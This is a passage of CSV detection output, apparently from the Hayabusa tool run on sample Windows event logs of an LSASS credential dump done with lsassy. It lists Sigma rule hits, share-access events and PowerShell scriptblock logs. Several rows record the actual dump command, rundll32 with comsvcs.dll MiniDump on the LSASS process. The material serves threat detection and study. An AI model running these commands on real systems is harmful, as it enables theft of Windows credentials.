Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:10.526 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:39:26.224 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) "" # .Link # http://go.microsoft.com/fwlink/?LinkID=225750 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# Options include: RelativeFilePaths - [bool] Always resolve file paths using Resolve-Path -Relative. The default is to use some heuristics to guess if relative or absolute is better. To customize your own custom options, pass a hashtable to CompleteInput, e.g. return [System.Management.Automation.CommandCompletion]::CompleteInput($inputScript, $cursorColumn, @{ RelativeFilePaths=$false } #> [CmdletBinding(DefaultParameterSetName = 'ScriptInputSet')] Param( [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 0)] [string] $inputScript, [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 1)] [int] $cursorColumn, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 0)] [System.Management.Automation.Language.Ast] $ast, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 1)] [System.Management.Automation.Language.Token[]] $tokens, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 2)] [System.Management.Automation.Language.IScriptPosition] $positionOfCursor, [Parameter(ParameterSetName = 'ScriptInputSet', Position = 2)] [Parameter(ParameterSetName = 'AstInputSet', Position = 3)] [Hashtable] $options = $null ) End { if ($psCmdlet.ParameterSetName -eq 'ScriptInputSet') { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#inputScript#> $inputScript, <#cursorColumn#> $cursorColumn, <#options#> $options) } else { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#ast#> $ast, <#tokens#> $tokens, <#positionOfCursor#> $positionOfCursor, <#options#> $options) } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$space = New-Object System.Management.Automation.Host.BufferCell $space.Character = ' ' $space.ForegroundColor = $host.ui.rawui.ForegroundColor $space.BackgroundColor = $host.ui.rawui.BackgroundColor $rect = New-Object System.Management.Automation.Host.Rectangle $rect.Top = $rect.Bottom = $rect.Right = $rect.Left = -1 $origin = New-Object System.Management.Automation.Host.Coordinates $Host.UI.RawUI.CursorPosition = $origin $Host.UI.RawUI.SetBufferContents($rect, $space) # .Link # http://go.microsoft.com/fwlink/?LinkID=225747 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param([string[]]$paths) $OutputEncoding = [System.Console]::OutputEncoding if($paths) { foreach ($file in $paths) { Get-Content $file | more.com } } else { $input | more.com },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME Get-Help .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='AllUsersView', HelpUri='http://go.microsoft.com/fwlink/?LinkID=113316')] param( [Parameter(Position=0, ValueFromPipelineByPropertyName=$true)] [string] ${Name}, [string] ${Path}, [ValidateSet('Alias','Cmdlet','Provider','General','FAQ','Glossary','HelpFile','ScriptCommand','Function','Filter','ExternalScript','All','DefaultHelp','Workflow')] [string[]] ${Category}, [string[]] ${Component}, [string[]] ${Functionality}, [string[]] ${Role}, [Parameter(ParameterSetName='DetailedView', Mandatory=$true)] [switch] ${Detailed}, [Parameter(ParameterSetName='AllUsersView')] [switch] ${Full}, [Parameter(ParameterSetName='Examples', Mandatory=$true)] [switch] ${Examples}, [Parameter(ParameterSetName='Parameters', Mandatory=$true)] [string] ${Parameter}, [Parameter(ParameterSetName='Online', Mandatory=$true)] [switch] ${Online}, [Parameter(ParameterSetName='ShowWindow', Mandatory=$true)] [switch] ${ShowWindow}) #Set the outputencoding to Console::OutputEncoding. More.com doesn't work well with Unicode. $outputEncoding=[System.Console]::OutputEncoding Get-Help @PSBoundParameters | more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME New-Item .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='pathSet', SupportsShouldProcess=$true, SupportsTransactions=$true, ConfirmImpact='Medium')] [OutputType([System.IO.DirectoryInfo])] param( [Parameter(ParameterSetName='nameSet', Position=0, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='pathSet', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [System.String[]] ${Path}, [Parameter(ParameterSetName='nameSet', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [AllowNull()] [AllowEmptyString()] [System.String] ${Name}, [Parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [System.Object] ${Value}, [Switch] ${Force}, [Parameter(ValueFromPipelineByPropertyName=$true)] [System.Management.Automation.PSCredential] ${Credential} ) begin { try { $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('New-Item', [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd -Type Directory @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline() $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param( [Parameter(ValueFromPipeline=$true)] [string[]] $verb = '*' ) begin { $allVerbs = [PSObject].Assembly.GetTypes() | Where-Object {$_.Name -match '^Verbs.'} | Get-Member -type Properties -static | Select-Object @{ Name='Verb' Expression = {$_.Name} }, @{ Name='Group' Expression = { $str = ""$($_.TypeName)"" $str.Substring($str.LastIndexOf('Verbs') + 5) } } } process { foreach ($v in $verb) { $allVerbs | Where-Object { $_.Verb -like $v } } } # .Link # http://go.microsoft.com/fwlink/?LinkID=160712 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[CmdletBinding()] param( [ValidateRange(2, 2147483647)] [int] ${Width}, [Parameter(ValueFromPipeline=$true)] [psobject] ${InputObject}) begin { try { $PSBoundParameters['Stream'] = $true $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('Out-String',[System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } } <# .ForwardHelpTargetName Out-String .ForwardHelpCategory Cmdlet #>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location A:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location B:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location C:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location D:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location E:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location F:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location G:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location H:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location I:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location J:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location K:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location L:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location M:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location N:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location O:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location P:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Q:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location R:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location S:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location T:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location U:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location V:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location W:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location X:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Y:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Z:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location ..,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location \,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Read-Host 'Press Enter to continue...' | Out-Null,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$this.ServiceName,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDateTime($args[0]),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDmtfDateTime($args[0]),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\vtnr8kff.dmp full;Wait-Process -Id (Get-Process rundll32).id",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" NestedModules=""Microsoft.PowerShell.Commands.Management.dll"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285756' CmdletsToExport=@(""Add-Content"", ""Clear-Content"", ""Clear-ItemProperty"", ""Join-Path"", ""Convert-Path"", ""Copy-ItemProperty"", ""Get-EventLog"", ""Clear-EventLog"", ""Write-EventLog"", ""Limit-EventLog"", ""Show-EventLog"", ""New-EventLog"", ""Remove-EventLog"", ""Get-ChildItem"", ""Get-Content"", ""Get-ItemProperty"", ""Get-WmiObject"", ""Invoke-WmiMethod"", ""Move-ItemProperty"", ""Get-Location"", ""Set-Location"", ""Push-Location"", ""Pop-Location"", ""New-PSDrive"", ""Remove-PSDrive"", ""Get-PSDrive"", ""Get-Item"", ""New-Item"", ""Set-Item"", ""Remove-Item"", ""Move-Item"", ""Rename-Item"", ""Copy-Item"", ""Clear-Item"", ""Invoke-Item"", ""Get-PSProvider"", ""New-ItemProperty"", ""Split-Path"", ""Test-Path"", ""Get-Process"", ""Stop-Process"", ""Wait-Process"", ""Debug-Process"", ""Start-Process"", ""Remove-ItemProperty"", ""Remove-WmiObject"", ""Rename-ItemProperty"", ""Register-WmiEvent"", ""Resolve-Path"", ""Get-Service"", ""Stop-Service"", ""Start-Service"", 